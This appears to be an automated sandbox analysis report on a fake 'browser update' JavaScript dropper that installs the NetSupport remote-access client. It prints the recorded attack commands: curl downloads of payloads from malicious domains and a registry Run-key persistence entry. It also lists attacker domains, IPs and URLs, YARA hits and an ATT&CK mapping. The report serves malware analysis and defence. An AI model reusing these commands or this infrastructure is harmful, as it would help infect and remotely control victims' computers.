Source: HTCTL32.DLL.15.dr	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: TCCTL32.DLL.15.dr	Binary or memory string: VMWare
Source: curl.exe, 00000004.00000003.561222041.0000024355B90000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
Source: client32.exe, 00000014.00000003.590564191.000000000119F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: curl.exe, 00000006.00000002.564536737.000002519C813000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.564441553.000002519C810000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.607467599.000000000162F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: curl.exe, 00000008.00000003.566338446.000001E004530000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^

Source: C:\ProgramData\client32.exe

Code function: 18_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

18_2_11162BB7

Source: C:\ProgramData\client32.exe

Code function: 18_2_11148360 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,

18_2_11148360

Source: C:\ProgramData\7zz.exe

Code function: 15_2_00471C24 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

15_2_00471C24

Source: C:\ProgramData\client32.exe

Code function: 18_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

18_2_1117D104

Source: C:\ProgramData\7zz.exe	Code function: 15_2_0046E6AA SetUnhandledExceptionFilter,	15_2_0046E6AA
Source: C:\ProgramData\7zz.exe	Code function: 15_2_0046E6BC SetUnhandledExceptionFilter,	15_2_0046E6BC
Source: C:\ProgramData\client32.exe	Code function: 18_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	18_2_110934A0
Source: C:\ProgramData\client32.exe	Code function: 18_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,	18_2_11031780
Source: C:\ProgramData\client32.exe	Code function: 18_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_11162BB7
Source: C:\ProgramData\client32.exe	Code function: 18_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_1116EC49

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Domain query: mangoairsoft.com
Source: C:\Windows\System32\wscript.exe	Domain query: magydostravel.com
Source: C:\Windows\System32\wscript.exe	Network Connect: 188.127.230.147 443	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 185.9.147.166 443	Jump to behavior

Source: C:\ProgramData\client32.exe

Code function: 18_2_11113190 GetKeyState,DeviceIoControl,keybd_event,

18_2_11113190

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C://ProgramData//fyAAWPXvDMiNSTKqVPpzzNr.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\sett.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\7z.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /h /y 7zz.exe C:\ProgramData\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe TIMEOUT /T 7
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\client32.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\7zz.exe C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\client32.exe C:\ProgramData\client32.exe	Jump to behavior

Source: C:\ProgramData\client32.exe

Code function: 18_2_110EE230 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,

18_2_110EE230

Source: 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: Shell_TrayWnd
Source: 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, client32.exe, 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: Progman

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\ProgramData\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	18_2_11174B29
Source: C:\ProgramData\client32.exe	Code function: GetLocaleInfoA,	18_2_1116C24E
Source: C:\ProgramData\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	18_2_111746A1
Source: C:\ProgramData\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	18_2_11174B90
Source: C:\ProgramData\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	18_2_11174BCC

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\ProgramData\7zz.exe

Code function: 15_2_0040C756 GetSystemTime,SystemTimeToFileTime,

15_2_0040C756

Source: C:\ProgramData\7zz.exe

Code function: 15_2_0046CF4C EntryPoint,GetVersion,GetCommandLineA,

15_2_0046CF4C

Source: Yara match	File source: 18.0.client32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.client32.exe.738d0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.client32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.client32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.client32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.client32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.client32.exe.73890000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.client32.exe.73890000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.client32.exe.738d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.client32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.client32.exe.738d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.client32.exe.6f990000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.client32.exe.73890000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.7zz.exe.27f13f8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.7zz.exe.2336d50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.7zz.exe.2453790.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.7zz.exe.23466c8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.7zz.exe.2460280.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.7zz.exe.245b908.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.7zz.exe.2460280.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.1074711959.0000000003270000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1074711959.000000000325F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.586153494.0000000000212000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.607562587.0000000000212000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.591691313.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.590783573.0000000000212000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.606379761.0000000000212000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1074264589.0000000000212000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1076342893.000000006F9D0000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.608303721.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.588400039.0000000000212000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7zz.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 2808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 2220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 6920, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\ProgramData\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\client32.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\ProgramData\PCICL32.DLL, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	221 Scripting	1 Valid Accounts	1 Valid Accounts	221 Scripting	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	2 Input Capture	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	2 Native API	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	4 Obfuscated Files or Information	Security Account Manager	35 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	11 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Command and Scripting Interpreter	Logon Script (Mac)	112 Process Injection	1 Software Packing	NTDS	41 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	2 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	14 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Valid Accounts	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	2 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Access Token Manipulation	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	112 Process Injection	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Browser_update16.0.5836.js	5%	ReversingLabs
Browser_update16.0.5836.js	7%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\ProgramData\7zz.exe	0%	ReversingLabs
C:\ProgramData\HTCTL32.DLL	3%	ReversingLabs
C:\ProgramData\PCICHEK.DLL	5%	ReversingLabs
C:\ProgramData\PCICL32.DLL	5%	ReversingLabs
C:\ProgramData\TCCTL32.DLL	3%	ReversingLabs
C:\ProgramData\client32.exe	12%	ReversingLabs
C:\ProgramData\msvcr100.dll	0%	ReversingLabs
C:\ProgramData\pcicapi.dll	3%	ReversingLabs
C:\ProgramData\putty.exe	0%	ReversingLabs
C:\ProgramData\remcmdstub.exe	3%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
magydostravel.com	8%	Virustotal		Browse
mangoairsoft.com	3%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.pci.co.uk/support	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://www.pci.co.uk/supportsupport	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
http://127.0.0.1RESUMEPRINTING	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://mangoairsoft.com/U	0%	Avira URL Cloud	safe
http://%s/testpage.htmwininet.dll	0%	Avira URL Cloud	safe
http://crl.v	0%	URL Reputation	safe
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat	0%	Avira URL Cloud	safe
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?4	0%	Avira URL Cloud	safe
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe	10%	Virustotal		Browse
http://%s/testpage.htm	0%	Avira URL Cloud	safe
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe	100%	Avira URL Cloud	malware
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z	100%	Avira URL Cloud	malware
http://127.0.0.1	0%	Avira URL Cloud	safe
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat-o	0%	Avira URL Cloud	safe
https://mangoairsoft.com/	0%	Avira URL Cloud	safe
http://94.158.247.23/fakeurl.htm	100%	Avira URL Cloud	malware
http://%s/fakeurl.htm	0%	Avira URL Cloud	safe
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe-	0%	Avira URL Cloud	safe
https://magydostravel.com/cdn/91c818ee6e9ec29f8c1.php	100%	Avira URL Cloud	malware
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z-	0%	Avira URL Cloud	safe
https://magydostravel.com/cdn/zwmrqqgqnaww.php	100%	Avira URL Cloud	malware
https://magydostravel.com/8	100%	Avira URL Cloud	malware
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf250	0%	Avira URL Cloud	safe
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z~	0%	Avira URL Cloud	safe
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?487817	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
geography.netsupportsoftware.com	62.172.138.67	true	false		high
magydostravel.com	185.9.147.166	true	true	8%, Virustotal, Browse	unknown
mangoairsoft.com	188.127.230.147	true	true	3%, Virustotal, Browse	unknown
geo.netsupportsoftware.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe	true	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://geo.netsupportsoftware.com/location/loca.asp	false		high
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat	true	Avira URL Cloud: safe	unknown
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z	true	Avira URL Cloud: malware	unknown
http://94.158.247.23/fakeurl.htm	true	Avira URL Cloud: malware	unknown
https://magydostravel.com/cdn/91c818ee6e9ec29f8c1.php	true	Avira URL Cloud: malware	unknown
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?487817	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.netsupportsoftware.com	7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.dr	false		high
https://mangoairsoft.com/U	wscript.exe, 00000000.00000003.587018717.0000021D8FD03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.588803421.0000021D8FD05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pci.co.uk/support	7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591691313.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608303721.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	false	URL Reputation: safe	unknown
http://%s/testpage.htmwininet.dll	7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1076342893.000000006F9D0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr	false	Avira URL Cloud: safe	low
https://sectigo.com/CPS0	7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	false	URL Reputation: safe	unknown
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)	7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	false		high
http://ocsp.sectigo.com0	7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	false	URL Reputation: safe	unknown
http://www.pci.co.uk/supportsupport	7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591691313.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608303721.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	false	URL Reputation: safe	unknown
https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?4	wscript.exe, 00000000.00000002.588803421.0000021D8FD16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.588926321.0000021D90225000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.dr	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	7zz.exe, 0000000F.00000003.572396241.000000000231D000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.dr	false	URL Reputation: safe	unknown
http://127.0.0.1RESUMEPRINTING	7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr	false	URL Reputation: safe	low
